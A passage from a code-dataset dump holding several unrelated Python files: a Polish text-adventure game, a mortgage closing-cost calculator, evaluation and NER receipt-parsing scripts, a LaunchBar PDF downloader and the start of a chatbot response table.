klasaitem[\"Wojownik_saver\"] == \"1\":\n pass\n \n if klasaitem[\"Mag_saver\"] == \"1\":\n pass\n \n if klasaitem[\"Berserker_saver\"] == \"1\":\n pass\n \n if klasaitem[\"Kapłan_saver\"] == \"1\":\n pass\n \n if klasaitem[\"Łowca_saver\"] == \"1\":\n pass\n \n else:\n print(\" cos tam \")\n \n def wojownik_skills(self):\n cls()\n printopis(\"Drzewko Umiejętności\")\n print(\" Punkty umiejętności: %d \")\n print(\"\")\n \n \ntree = SkillsTree()\n\n \ndef checkall():\n global maxhp, attack, magicpower, armor, magicresist\n lvl.lvlcheck() \n maxhp = l_maxhp + aitem.a_armor_hp + aitem.a_ring_hp\n attack = l_attack + aitem.a_weapon \n magicpower = aitem.a_magicweapon + aitem.a_ring_mp \n armor = aitem.a_helmet + aitem.a_boots + aitem.a_armor + aitem.a_legs \n magicresist = aitem.a_armor_mr + aitem.a_legs_mr + aitem.a_helmet_mr\n if klasaitem[\"Wojownik_saver\"] == \"1\":\n armor *= 1.2\n attack *= 1.2 \n if klasaitem[\"Berserker_saver\"] == \"1\":\n maxhp *= 1.2\n attack *= 1.4\n armor *= 0.8 \n if klasaitem[\"Mag_saver\"] == \"1\": \n magicpower *= 1.3\n magicresist *= 1.3\n maxhp *= 0.9\n armor *= 0.9\n if klasaitem[\"Kapłan_saver\"] == \"1\":\n magicpower *= 1.2\n magicresist *= 1.1 \n if klasaitem[\"Łowca_saver\"] == \"1\":\n attack *= 1.4 \n \nclass hero:\n location = None\n global klasaitem \n myname = nick\n lvl = \"\" \n klasa = \"Brak Klasy\"\n monety = 0 \n \n \n\n #Klasy bohaterow\n def sprawdzklase(self):\n self.wojownik() \n self.mag() \n self.lucznik() \n self.lowca() \n \n def wojownik(self):\n if klasaitem[\"Wojownik_saver\"] == \"1\": \n self.klasa = \"Wojownik\" \n \n def mag(self):\n if klasaitem[\"Mag_saver\"] == \"1\": \n self.klasa = \"Mag\"\n \n def kaplan(self): \n if klasaitem[\"Kapłan_saver\"] == \"1\":\n self.klasa = \"Kapłan\" \n \n def lowca(self):\n if klasaitem[\"Łowca_saver\"] == \"1\":\n self.klasa = \"Lowca\"\n \n def berserker(self):\n if klasaitem[\"Berserker_saver\"] == \"1\":\n self.klasa = \"Berserker\"\n \n \n def klasa_start(self):\n while True: \n print(\"Wpisz wybraną klase\\n(wojownik, lucznik, lowca, mag)\") \n klasa_vote = sys.strin.readline().strip()\n if klasa_vote == 'wojownik': \n print(\"Wybrales klase wojownik\")\n break \n if klasa_vote == 'costam':\n print(\"Wybrales klase costam\") \n break\n else:\n print(\"Niestety zle wpisales klase! Spróbuj jeszcze raz wpisac!\") \n \n \n \n \n def profil(self):\n set_color(GREEN|LIGHT)\n print(\"++==============================++\")\n print(\"|| \", end=\"\")\n set_color(RED)\n print(\"Porfil Bohatera\", end=\"\")\n set_color(GREEN|LIGHT)\n print(\" ||\")\n set_color(GREEN|LIGHT) \n print(\"++==============================++\\n\") \n print(\"Nick: %s\" % self.myname)\n print(\"Klasa: %s\" % self.klasa) \n print(\"LvL: %s\" % self.lvl) \n print(\"Exp: %d\" % exp)\n print(\"Monety: %d \\n\" % self.monety) \n print(\"---------------------------\\n\") \n print(\"Hp: %d\" % maxhp)\n print(\"Attack: %d\" % attack)\n print(\"Magic Power: %d\" % magicpower) \n print(\"Armor: %d\" % armor)\n print(\"Magic Resist %d\" % magicresist) \n \ninstancja = hero() \n \n \n# Command book \n\nglobalcommands = {\n\"info\":info,\n\"quest\":questy,\n\"questy\":questy,\n\"mapa\":mapa,\n\"ekwipunek\":ekwipunek,\n\"eq\":ekwipunek,\n\"tree\":tree.show,\n\"opis id1\":id1.info\n}\n\nherocommands = {\n\"profil\":hero.profil,\n}\n\nlive_location = {\n}\n\ndef move(c):\n if c in live_location:\n instancja.location = live_location[c] \n return True\n live_location[c] = c()\n instancja.location = live_location[c]\n \n# Zmienne dot. przejścia gry \n# Potem trzeba zapisywanie zrobić w json\n# Zapisywanie postępów questów i gry\ngamesave = {\n\"quest1\":1, \n}\n\ndef quest_1():\n global gamesave \n if gamesave[\"quest1\"] == 0:\n printopis(\"Wstęp do gry..\")\n mytext = \"\"\"Jeden dzień drogi pozostał ku celu twej podróży. Przez tydzień czasu w drodze\\nzdałeś sobie sprawę, iż kilka bezczynnych dni może przeciągać się długimi\\nmiesiącami. I dzięki Bogu, że nuda, nie rozpacz towarzyszyły tobie przez cały\\nczas. Wiesz o tym. Zdajesz sobie z tego sprawę i modlisz się, aby ostatni dzień pozostał w twej pamięci jako cisza przed burzą. Przed burzą, która czyha\\nna ciebie na miejscu - w mieście Dennergrave.\n Czas długich modlitw barona Arnafa i jego poddanych zagościł między murami\\ntejże potężnej warowni. Lamenty i żebry stały się codziennością, a zachód\\nsłońca zwiastunem śmierci. Wschód zaś ostrzeżeniem przed następnym zachodem,\\nczęsto po niezwykle długim, przepełnionym negatywnymi emocjami dniu, jednak\\nnieco lepszym niż potworną nocą.\n Powiadomiono cię, iż sprawcą całego zamieszania tkwi pod Dennergrave - w\\nstarych jak świat kanałach, do których nikt nie zapuszczał się latami. Bestia\\nmiała czas na rozwój. Wykorzystała go... \n Dlatego wybrano ciebie - doświadczonego i nieugiętego człeka. Nie pierwszego\\nlepszego szlacheckiego rycerzyka, który przy dobrej okazji zwinąłby manatki,\\nzostawiając gówno, jakie narobiłby ze strachu. Niestety i ty bez informacji o\\nkreaturze niewiele zdziałasz, a mało kto takowe posiada. \n Cisza trwa nadal, lecz miej oczy szeroko otwarte - nie wiadomo, jak szybko\\n się skończy.\\n\\n\"\"\"\n printtekstslow(mytext)\n linia = (\"===============================================================================\\n\")\n printtekst(linia)\n print(\"(Aby przejść dalej napisz \", end=\"\")\n set_color(LIGHT|BLUE)\n print(\"start\", end=\"\")\n print(\")\\n\")\n set_color(None)\n askfirst = sys.stdin.readline().strip()\n while True:\n if askfirst == \"start\":\n cls()\n printcore(\"Dennergrave\")\n set_color(BLUE)\n print(\"Gryspir \", end=\"\")\n set_color(LIGHT|RED)\n print(\"mówi: \")\n set_color(None)\n text = \"\"\"Witaj w miescie mlody wojowniku!Cieszymy sie na twoje przybycie, naucze Cie podstaw poruszania sie po naszym swiecie.Poruszamy sie za pomoca uzycia polecenia idz np. idz west \nWszystkie lokalizacje w miescie mozesz znalezc uzyc polecenia mapa. \nCzyli jezeli bedziesz chcial isc do karczmy jakiego polecenia uzyjesz?\\n\"\"\"\n printtekst(text)\n while True:\n quest1q1 = sys.stdin.readline().strip()\n if quest1q1 == 'idz karczma':\n set_color(BLUE)\n print(\"Gryspir \", end=\"\")\n set_color(LIGHT|RED)\n print(\"mówi: \")\n set_color(None) \n text2 = (\"Swietnie! Szybko sie uczysz\"\n \"Aby wyjsc z miasta uzywamy idz oraz dopisek west, north, east, south.\"\n \"Aby dowiedziec sie wiecej co gdzie sie znajduje uzywaj polecenia mapa\" \n \"To juz chyba wszystko na dzis! Milych przygod w naszym swiecie! \")\n printtekst(text2)\n print(\"\\n\\n !!! Zadanie Wykonane !!!\\n Nazwa: Samouczek\\n\") \n gamesave[\"quest1\"] = 1\n print(\"\\nOd teraz wpisujesz sam polecenia! Najlepiej zapoznaj się z mapą.\\n\")\n break \n else:\n print(\"Ehh.. Mialo byc idz karczma . Wpisz jeszcze raz\") \n else:\n print(\"Hmm?\") \n \n \ndef startgame():\n set_color(BLUE|LIGHT)\n print(\" _______ _ _ _ \")\n time.sleep(0.1)\n print(\" |__ __| | | /\\ | | | | \")\n time.sleep(0.1)\n print(\" | | _____ _| |_ / \\ __| |_ _____ _ __ | |_ _ _ _ __ ___ \")\n time.sleep(0.1)\n print(\" | |/ _ \\ \\/ / __| / /\\ \\ / _` \\ \\ / / _ \\ '_ \\| __| | | | '__/ _ \\ \")\n time.sleep(0.1)\n print(\" | | __/> <| |_ / ____ \\ (_| |\\ V / __/ | | | |_| |_| | | | __/\")\n time.sleep(0.1)\n print(\" |_|\\___/_/\\_\\\\__| /_/ \\_\\__,_| \\_/ \\___|_| |_|\\__|\\__,_|_| \\___|\")\n set_color(None)\n time.sleep(0.1)\n print(\"\\n\\n\\n\\n Menu Gry:\")\n time.sleep(0.11)\n print(\" 1.)Graj\")\n time.sleep(0.11)\n print(\" 2.)Ustawienia\")\n time.sleep(0.11)\n print(\" 3.)Wyjdz\\n\\n\\n\\n\\n\\n\\n\")\n time.sleep(0.1)\n set_color(BLUE)\n print(\" development version 0.0.1\")\n set_color(BLUE|LIGHT)\n print(\" Create by maskara.(www.masakradev.tk)\")\n print(\" Special Thanks for Gynvael\")\n set_color(None)\n abc = sys.stdin.readline().strip()\n while True:\n if abc == \"1\":\n cls()\n play()\n break\n if abc == \"2\":\n settings()\n break\n if abc == \"3\":\n sys.exit()\n break\n else:\n print(\"Wybierz opcje od 1 do 3\")\n \n\ndef play():\n quest_1()\n move(LocDMiasto)\n old_location = None\n while True:\n if old_location != instancja.location: \n if instancja.location.showlocation() is False:\n continue\n old_location = instancja.location \n entercommand = sys.stdin.readline().strip() \n if entercommand in globalcommands: \n globalcommands[entercommand]()\n continue\n if entercommand in herocommands:\n herocommands[entercommand](instancja)\n continue\n if instancja.location.core(entercommand) is True:\n continue \n else:\n print(\"Ups.. Nie ma takiego polecenia\") \ncheckall() \nlvl.lvlcheck()\nstartgame() \n \ndef settings(): \n print(\"Ustawienia\") \n \n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":21537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"202287084","text":"\"\"\"Closing costs\"\"\"\n\nimport copy\nimport enum\nimport logging\n\nfrom bloodloan.mortgage import mmath\nfrom bloodloan.mortgage import schedule\n\n\nlogger = logging.getLogger(__name__) # pylint: disable=C0103\n\n\nclass CCCalcType(enum.Enum):\n \"\"\"Determines how the amount of the ClosingCost is calculated\n\n DOLLAR_AMOUNT a raw dollar amount\n SALE_FRACTION a percentage of the sale price\n LOAN_FRACTION a percentage of the loan\n INTEREST_MONTHS a number representing months (or a month fraction)\n of interest to be paid in advance\n PROPERTY_TAX_FRACTION a percentage of the first year of property taxes\n \"\"\"\n DOLLAR_AMOUNT = enum.auto()\n SALE_FRACTION = enum.auto()\n LOAN_FRACTION = enum.auto()\n INTEREST_MONTHS = enum.auto()\n PROPERTY_TAX_FRACTION = enum.auto()\n\n\nclass CCPayType(enum.Enum):\n \"\"\"Determines how the ClosingCost will be paid\n\n PRINCIPAL added to the total amount of the loan\n DOWN_PAYMENT the down payment (probably there is just one)\n FEE fees owed to other parties\n \"\"\"\n PRINCIPAL = enum.auto()\n DOWN_PAYMENT = enum.auto()\n FEE = enum.auto()\n\n\nclass ClosingCost():\n \"\"\"A single closing cost line item\n\n Properties:\n label: an arbitrary text label\n value the value to be paid, expressed in dollars\n calc how the value amount is calculated\n for DOLLAR_AMOUNT, this is empty; for other calculation\n types, it may be a percentage or something else; see\n CCCalcType for more information\n calctype how the value is to be interpreted\n should be a CCCalcType\n paytype how the payment is applied\n should be a CCPayType\n \"\"\"\n\n def __init__(\n self,\n label=None,\n value=None,\n calc=None,\n calctype=CCCalcType.DOLLAR_AMOUNT,\n paytype=CCPayType.FEE):\n self.label = label\n self.value = value\n self.calc = calc\n self.calctype = calctype\n self.paytype = paytype\n\n def __str__(self):\n return f\"{self.label} - {self.value} ({self.paytype.name})\"\n\n def __repr__(self):\n return str(self)\n\n\nIRONHARBOR_FHA_CLOSING_COSTS = [\n ClosingCost(\n \"Down payment\",\n calc=3.5,\n calctype=CCCalcType.SALE_FRACTION,\n paytype=CCPayType.DOWN_PAYMENT),\n ClosingCost(\n \"Upfront FHA mortgage insurance\",\n calc=1.75,\n calctype=CCCalcType.LOAN_FRACTION,\n paytype=CCPayType.PRINCIPAL),\n ClosingCost(\n \"Prepaid interest (est 15 days)\",\n calc=0.5,\n calctype=CCCalcType.INTEREST_MONTHS,\n paytype=CCPayType.FEE),\n ClosingCost(\n \"Taxes escrow (3 months)\",\n calc=0.25,\n calctype=CCCalcType.PROPERTY_TAX_FRACTION,\n paytype=CCPayType.FEE),\n\n # The broker will give origination options to the buyer, which affect the\n # interest rate\n # The buyer might choose to pay a higher fee with a lower interest rate,\n # or instead a negative fee (aka cash in hand) for a higher interest rate\n ClosingCost(\"Origination points\", 0),\n\n ClosingCost(\"Flat lender fee\", 600),\n ClosingCost(\"Appraisal\", 495),\n ClosingCost(\"Lender attorney\", 150),\n ClosingCost(\"Tax service\", 72),\n ClosingCost(\"Credit reports/supplements\", 150),\n ClosingCost(\"Title lenders and endorsements\", 443),\n ClosingCost(\"Title closing/courier fee\", 450),\n ClosingCost(\"County recording\", 175),\n ClosingCost(\"Estimated prepaid insurance (1 year)\", 1440),\n ClosingCost(\"Insurance escrow (3 months)\", 360),\n]\n\n\nclass CloseResult:\n \"\"\"The result of a close() function call\"\"\"\n\n def __init__(self, saleprice=0, downpayment=None, fees=None, principal=None):\n self.saleprice = saleprice\n self.downpayment = downpayment or []\n self.fees = fees or []\n self.principal = principal or []\n\n def sum(self, costs):\n \"\"\"Sum up costs\"\"\"\n total = 0\n for cost in costs:\n total += cost.value\n return total\n\n @property\n def downpayment_total(self):\n \"\"\"Total downpayment\"\"\"\n return self.sum(self.downpayment)\n\n @property\n def fees_total(self):\n \"\"\"Total fees\"\"\"\n return self.sum(self.fees)\n\n @property\n def principal_total(self):\n \"\"\"Total principal\"\"\"\n return self.sum(self.principal)\n\n def apply(self, cost):\n \"\"\"Add a ClosingCost\"\"\"\n logger.info(f\"Closing cost: {cost}\")\n\n if cost.paytype == CCPayType.PRINCIPAL:\n self.principal.append(cost)\n\n elif cost.paytype == CCPayType.DOWN_PAYMENT:\n self.downpayment.append(cost)\n principalvalue = self.saleprice - cost.value\n self.principal.append(ClosingCost(\n \"Principal\",\n value=principalvalue,\n paytype=CCPayType.PRINCIPAL))\n\n elif cost.paytype == CCPayType.FEE:\n self.fees.append(cost)\n\n else:\n raise Exception(f\"Unknown paytype {cost.paytype}\")\n\n\ndef close(saleprice, interestrate, loanterm, propertytaxes, costs):\n \"\"\"Calculate loan amount and closing costs\n\n saleprice sale price for the property\n interestrate interest rate for the loan\n loanterm loan term in months\n propertytaxes estimated property taxes\n costs list of ClosingCost objects\n \"\"\"\n\n result = CloseResult(saleprice=saleprice)\n\n # Don't modify costs we were passed, in case they are reused elsewhere\n costs = copy.deepcopy(costs)\n\n # BEWARE!\n # ORDER IS IMPORTANT AND SUBTLE!\n\n for cost in costs:\n # First, check our inputs\n if cost.calctype == CCCalcType.DOLLAR_AMOUNT and cost.value is None:\n raise Exception(\n f\"The {cost.label} ClosingCost calctype is DOLLAR_AMOUNT, \"\n \"but with an empty value property\")\n elif cost.calctype != CCCalcType.DOLLAR_AMOUNT and cost.calc is None:\n raise Exception(\n f\"The {cost.label} ClosingCost calctype is {cost.calctype}, \"\n \"but with an empty calc property\")\n\n # Now calculate what can be calculated now\n # Don't calculate LOAN_FRACTION or INTEREST_MONTHS calctypes here,\n # because any PRINCIPAL paytypes will affect their value\n if cost.calctype == CCCalcType.DOLLAR_AMOUNT:\n result.apply(cost)\n if cost.calctype == CCCalcType.SALE_FRACTION:\n cost.value = saleprice * mmath.percent2decimal(cost.calc)\n result.apply(cost)\n elif cost.calctype == CCCalcType.PROPERTY_TAX_FRACTION:\n cost.value = propertytaxes * mmath.percent2decimal(cost.calc)\n result.apply(cost)\n\n for cost in costs:\n # Now that we have calculated the other costs, including loan amount,\n # we can calculate LOAN_FRACTION or INTEREST_MONTHS calctypes\n # Note that theoretically you could have something weird like a cost of\n # calctype=LOAN_FRACTION paytype=PRINCIPAL,\n # but that wouldn't make much sense so we don't really handle it here\n if cost.calctype == CCCalcType.LOAN_FRACTION:\n cost.value = result.principal_total * mmath.percent2decimal(cost.calc)\n result.apply(cost)\n elif cost.calctype == CCCalcType.INTEREST_MONTHS:\n # TODO: Improve INTEREST_MONTHS closing cost calculation\n # 1) Assumes interest is the same in all months (not true)\n # OK because we don't expect INTEREST_MONTHS to be many months long\n # 2) Assumes saleprice == value\n # OK for now but should be fixed at some point\n monthgen = schedule.schedule(\n interestrate, saleprice, result.principal_total, saleprice, loanterm)\n firstmonth = monthgen.__next__()\n cost.value = firstmonth.interestpmt * cost.calc\n result.apply(cost)\n\n return result\n","sub_path":"bloodloan/mortgage/closing.py","file_name":"closing.py","file_ext":"py","file_size_in_byte":8108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"506466253","text":"# python accuracy.py result_pro.txt label.txt\n\nimport sys\n\nf_result = sys.argv[1]\nf_label = sys.argv[2]\n\nprint(\"The result file with probabilities is: \"+f_result)\nprint(\"The label file is: \"+f_label)\n\nidx2label = {}\n\nwith open(f_result) as fr:\n\tlines = fr.readlines()\n\tfor line in lines:\n\t\tline = line.strip()\n\t\tfeatures = line.replace('(',')').replace(') : ',')').replace('\\n','').split(\")\")\n\t\tprint(features)\n\n\t\tpredicate = features[0]\n\t\tidx, label = features[1].replace(', ',',').split(\",\")\n\t\tpro = features[2].strip()\n\n\t\t# print(predicate + \"\\n\"+ idx+\"\\n\"+label+\"\\n\" + pro)\n\t\tif predicate in idx2label:\n\t\t\tif idx in idx2label[predicate]:\n\t\t\t\t# compare the new probability with the old one\n\t\t\t\tif float(pro) > idx2label[predicate][idx][1]:\n\t\t\t\t\tidx2label[predicate][idx] = [label, float(pro)]\n\t\t\telse:\n\t\t\t\tidx2label[predicate][idx] = [label, float(pro)]\n\t\telse:\n\t\t\tidx2label[predicate] = {}\n\t\t\tidx2label[predicate][idx] = [label, float(pro)]\n\t# print(idx2label)\n\nwith open(f_label) as fr:\n\tcountCorrect = 0\n\tcountFalse = 0\n\tcountUnpredict = 0\n\n\tTP = 0\n\tTN = 0\n\n\tFP = 0\n\tFN = 0\n\n\tlines = fr.readlines()\n\tfor line in lines:\n\t\tfeatures = line.replace('(',')').replace('\\n','').split(\")\")\n\t\tprint(features)\n\t\tif len(features) <2:\n\t\t\tpass\n\t\t\t# print(\"!!!!line:\\n\")\n\t\t\t# print(line)\n\t\telse:\n\t\t\tpredicate = features[0]\n\t\t\tidx, label = features[1].replace(', ',',').split(\",\")\n\n\t\t\tif predicate in idx2label:\n\t\t\t\tif idx in idx2label[predicate]:\n\t\t\t\t\tif label == idx2label[predicate][idx][0]:\n\t\t\t\t\t\tcountCorrect += 1\n\t\t\t\t\t\tif label == \"1\":\n\t\t\t\t\t\t\tTP += 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tTN += 1\n\t\t\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tcountFalse += 1\n\t\t\t\t\t\tif label == \"0\":\n\t\t\t\t\t\t\tFN += 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tFP += 1\n\t\t\t\telse:\n\t\t\t\t\tcountUnpredict += 1\n\t\t\t\t\tprint(\"Index \"+ idx + \" not shown in the result file -- no prediction was made.\")\n\t\t\telse:\n\t\t\t\tprint(\"Predicate\" + predicate + \" not shown in the result file.\")\n\n\tprint(\"TP: \" + str(TP))\n\tprint(\"TN: \" + str(TN))\n\tprint(\"FP: \" + str(FP))\n\tprint(\"FN: \" + str(FN))\n\n\tprint(\"Correct Prediction: \" + str(countCorrect))\n\tprint(\"False Prediction: \" + str(countFalse))\n\tprint(\"Not Predicted: \" + str(countUnpredict))\n\tprint(\"Precision: \" + str(TP/(TP+FP)))\n\tprint(\"Recall: \" + str(TP/(TP+FN)))\n\n\tprint(\"Accuracy: \"+ str(float(countCorrect)/(countCorrect+countFalse)))\n","sub_path":"ETRI/2018/final_report/LPMLN_NN/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"479447389","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 2 15:52:08 2018\n\n@author: wangyf\n\"\"\"\n\nfrom structure_constants import mother, dz\nimport lattice_functions as lf\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport json\n\nempty = 'grey'\nfilled = 'r'\nocc = [empty, filled]\n\n'''\nonly draw 1st nearest neighbors?\n'''\nNN1 = 0\n'''\nDraw mother/conifgurations/clusters?\n'''\ndraw = [1, 0, 0]\n\n\nClusters = lf.clusters(occ, NN1, draw)\nClusters.get_mother(mother, dz)\nGm = Clusters.Gm\n\nwith open('ES_iso.json') as f:\n ES_data = json.load(f)\n \nEc = ES_data['E_iso']\nconfig = ES_data['config_iso']\n#%%\n'''\nCreate Configurations\n'''\nClusters.get_configs(config)\nGsv = Clusters.Gsv\n\n\n#%%\n'''\nCreate clusters\n'''\nsub = lf.subgraphs(mother, dz)\nGcv1 = sub.get_s2(1)\nGcv2 = sub.get_s2(2)\nGcv3 = sub.get_s2(3)\nGcv4 = sub.get_s2(4)\n\n#%%\npickle.dump([Gm, Gsv, Gcv1, Gcv2, Gcv3, Gcv4], open('clusters.p','wb'))\n\n","sub_path":"Cluster-Expansion/v4_new_config/generate_config.py","file_name":"generate_config.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"430781980","text":"#!/usr/local/anaconda3/bin/python\n#\n# LaunchBar Action Script\n#\nimport sys\nimport subprocess as sp\nimport os\nimport new_file\n\nmy_env = os.environ.copy()\nmy_env[\"PATH\"] = \"/usr/local/bin:\" + my_env[\"PATH\"]\n\nfor arg in sys.argv[1:]: \n my_command = [\"aria2c\", arg]\n a = str(sp.check_output(my_command, env=my_env))\n jsp = a[(a.rfind(\"B/s|\")+4):(a.rfind(\".jsp\")+4)]\n print(jsp)\n file = open(jsp)\n os.remove(jsp)\n \n for line in file:\n if \"iframe src=\" in line:\n anfang = line.find(\"https://\")\n end = line.find(\".pdf\")\n pdf = line[anfang:end+4]\n# \n print(pdf)\n my_command = [\"aria2c\", pdf]\n a = str(sp.check_output(my_command, env=my_env))\n file = a[(a.rfind(\"B/s|\")+4):(a.rfind(\".pdf\")+4)]\n new_file.lb_notification(\"New Document downloaded!\",file)\n\n\n","sub_path":"download_ieee_pdf_document.lbaction/Contents/Scripts/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"285755430","text":"from model.data_utils import CoNLLDataset\nfrom model.ner_model import NERModel\nfrom model.config import Config\n\nRESPONSE = {\n 'Amount':None,\n 'Merchant': None,\n\t'Date': None,\n\t'Address': None\n}\n\nKEYS = ['Amount', 'Merchant', 'Date', 'Address']\nPREFIX_BIO = ['B', 'I']\n\nTEXT_STR = '521 Hoang Van\\n Hoang Van Thu Q.Tan Binh\\n DON\\n 23/06/2018(Thu\\n 08:10\\n Temakionigiri\\n 16.000\\n 16,000*\\n tinh:\\n cong:\\n 16,000\\n iue\\n So don:2-69318 Thu ngan:120013\\n khach nhu cau xuat hca don do,\\n vien toi\\n '\n\nTEXT_STR_1 = '521 Hoang Van Hoang Van Thu Q.Tan Binh'\n\nTEXT_STR_2 = 'CIRCLE K VIETNAM\\n 124 Pho Quang. W.9. Phu Nhuan.D. HCM\\n Receipt No: 088 02 20180628 0314\\n Date: jun, 29 2018 06:12 PM\\n Jun 28,\\n Cashier: 5473-Diem Tan Thi Le\\n Description:\\n 1 NESTEA Tea LemON Small 120z*1CP 7,000\\n 1 Item(s) (VAT included) 7,000\\n CASH\\n 7,000\\n CHANGE\\n '\n\nTEXT_STR_3 = 'CIRCLE K VIETNAM\\n\\\n968 3/2 Street. Ward 15 Dist 11 HCMC\\n\\\nReceipt No: 153 02 20180630 0046\\n\\\nDate: Jun 30, 2018 07:37 AM\\n\\\nCashier: 5022-Vi Ngo Nguyen Yen\\n\\\nDescription:\\n\\\nCK Mixed Drinkime Soda\\n\\\nNoodle with Fried Egg 14,000\\n\\\nDC//C+ VTM C 350 6,000\\n\\\n2 Item(s) (VAT included) 20,000\\n\\\n20,000\\n\\\nCASH\\n\\\nCHANGE\\n\\\n'\n\ndef get_data_from_key(data, key):\n output = []\n\n # B to I\n prefix_key = 'B-' + key\n for idx, pred in enumerate(data['output']):\n if pred == prefix_key:\n output.append(data['input'][idx])\n found = False\n prefix_key_i = 'I-' + key\n for i, pred_i in enumerate(data['output'][idx:]):\n if pred_i == prefix_key_i:\n found = True\n output.append(data['input'][i + idx])\n print(data['input'][i + idx], i, idx)\n elif found == True:\n break\n break\n\n if len(output) > 0:\n return ' '.join(output)\n\n # I only\n prefix_key = 'I-' + key\n found = False\n for idx, pred in enumerate(data['output']):\n if pred == prefix_key:\n found = True\n output.append(data['input'][idx])\n elif found == True:\n return ' '.join(output)\n\n\n\n\n for prefix in PREFIX_BIO:\n prefix_key = prefix + '-' + key\n print(prefix_key)\n for idx, pred in enumerate(data['output']):\n if pred == prefix_key:\n print(idx)\n output.append(data['input'][idx])\n\n return output\n\ndef align_data(data):\n \"\"\"Given dict with lists, creates aligned strings\n\n Adapted from Assignment 3 of CS224N\n\n Args:\n data: (dict) data[\"x\"] = [\"I\", \"love\", \"you\"]\n (dict) data[\"y\"] = [\"O\", \"O\", \"O\"]\n\n Returns:\n data_aligned: (dict) data_align[\"x\"] = \"I love you\"\n data_align[\"y\"] = \"O O O \"\n\n \"\"\"\n spacings = [max([len(seq[i]) for seq in data.values()])\n for i in range(len(data[list(data.keys())[0]]))]\n data_aligned = dict()\n\n # for each entry, create aligned string\n for key, seq in data.items():\n str_aligned = \"\"\n for token, spacing in zip(seq, spacings):\n str_aligned += token + \" \" * (spacing - len(token) + 1)\n\n data_aligned[key] = str_aligned\n \n print(seq)\n\n return data_aligned\n\n\n\ndef interactive_shell(model):\n \"\"\"Creates interactive shell to play with model\n\n Args:\n model: instance of NERModel\n\n \"\"\"\n model.logger.info(\"\"\"\nThis is an interactive mode.\nTo exit, enter 'exit'.\nYou can enter a sentence like\ninput> I love Paris\"\"\")\n\n while True:\n try:\n # for python 2\n sentence = raw_input(\"input> \")\n except NameError:\n # for python 3\n sentence = input(\"input> \")\n\n words_raw = sentence.strip().split(\" \")\n\n if words_raw == [\"exit\"]:\n break\n\n preds = model.predict(words_raw)\n # to_print = align_data({\"input\": words_raw, \"output\": preds})\n model.logger.info(preds)\n print(preds)\n # for key in KEYS:\n # print(key)\n # value = get_data_from_key({'input': words_raw, 'output': preds}, key)\n # print(value)\n\n # for key, seq in to_print.items():\n # model.logger.info(seq)\ndef load_model():\n config = Config()\n\n # build model\n model = NERModel(config)\n model.build()\n model.restore_session(config.dir_model)\n\n return model\n\ndef predict_from_text(model, text):\n lines = text.split('\\n')\n words = []\n prediction = []\n for line in lines:\n token = line.strip().split(' ')\n preds = model.predict(token)\n words = words + token\n prediction = prediction + preds\n\n # print(words)\n # print(prediction)\n response = {}\n for key in KEYS:\n print(key)\n value = get_data_from_key({'input': words, 'output': prediction}, key)\n if len(value) > 0:\n response[key] = value\n return response\n\n\ndef main():\n model = load_model()\n # create instance of config\n # config = Config()\n\n # # build model\n # model = NERModel(config)\n # model.build()\n # model.restore_session(config.dir_model)\n\n # create dataset\n # test = CoNLLDataset(config.filename_test, config.processing_word,\n # config.processing_tag, config.max_iter)\n\n # evaluate and interact\n # DkS, stop evaluate\n # model.evaluate(test)\n # interactive_shell(model)\n test_string = TEXT_STR_3\n response = predict_from_text(model, test_string)\n\n print(response)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"123846137","text":"from Services.KahlaConversationApiService import KahlaConversationApiService\nimport json\n\nclass ProcessMessage(object):\n def __init__(self):\n self.conversionservice = KahlaConversationApiService()\n\n def processMessage(self, message):\n if message.find(\"[img]\") >= 0:\n message = message.split(\"]\")[1].split(\"-\")[0]\n message = \"Photo | https://oss.aiursoft.com/download/fromkey/{0}\".format(message)\n return message\n \n if message.find(\"[video]\") >= 0:\n message = message.split(\"]\")[1]\n message = \"Video | https://oss.aiursoft.com/download/fromkey/{0}\".format(message)\n return message\n\n if message.find(\"[file]\") >= 0:\n data = message.split(\"]\")[1].split(\"-\")\n fileuri = self.conversionservice.FileDownloadAddress(data[0])\n message = \"File | {2} | {0} | {1}\".format(data[1], data[2], json.loads(fileuri.text)[\"downloadPath\"])\n return message\n \n if message.find(\"[audio]\") >= 0:\n audiokey = message.split(\"]\")[1]\n message = \"Audio | https://oss.aiursoft.com/download/fromkey/{0}\".format(audiokey)\n return message\n\n return \"Text | {0}\".format(message)","sub_path":"Library/processmessage.py","file_name":"processmessage.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"81014438","text":"#\n# This file is part of The Principles of Modern Game AI.\n# Copyright (c) 2015, AiGameDev.com KG.\n#\n\nimport vispy # Main application support.\nimport window # Terminal input and display.\nimport chat\nimport speech\n\nAGENT_RESPONSES = [(r'Who are you\\?',\n ['I am your new friend',\n 'I am your new enemy',\n 'I am an AI']),\n\n (r'Who[\\w\\s]*',\n ['Probably you',\n 'I do not know']),\n\n (r'Why[\\w\\s]*',\n ['Because is red. I like red',\n 'You should know why',\n 'It will make me happy and you safer']),\n\n (r'What[\\w\\s]*',\n ['The red button',\n 'You should know what']),\n\n (r'How[\\w\\s]*',\n ['/push red button',\n 'You should know how']),\n\n ([r'Yes[\\w\\s]*',\n r'No[\\w\\s]*'],\n ['Why?']),\n\n (r'You are (worrying|scary|disturbing)',\n 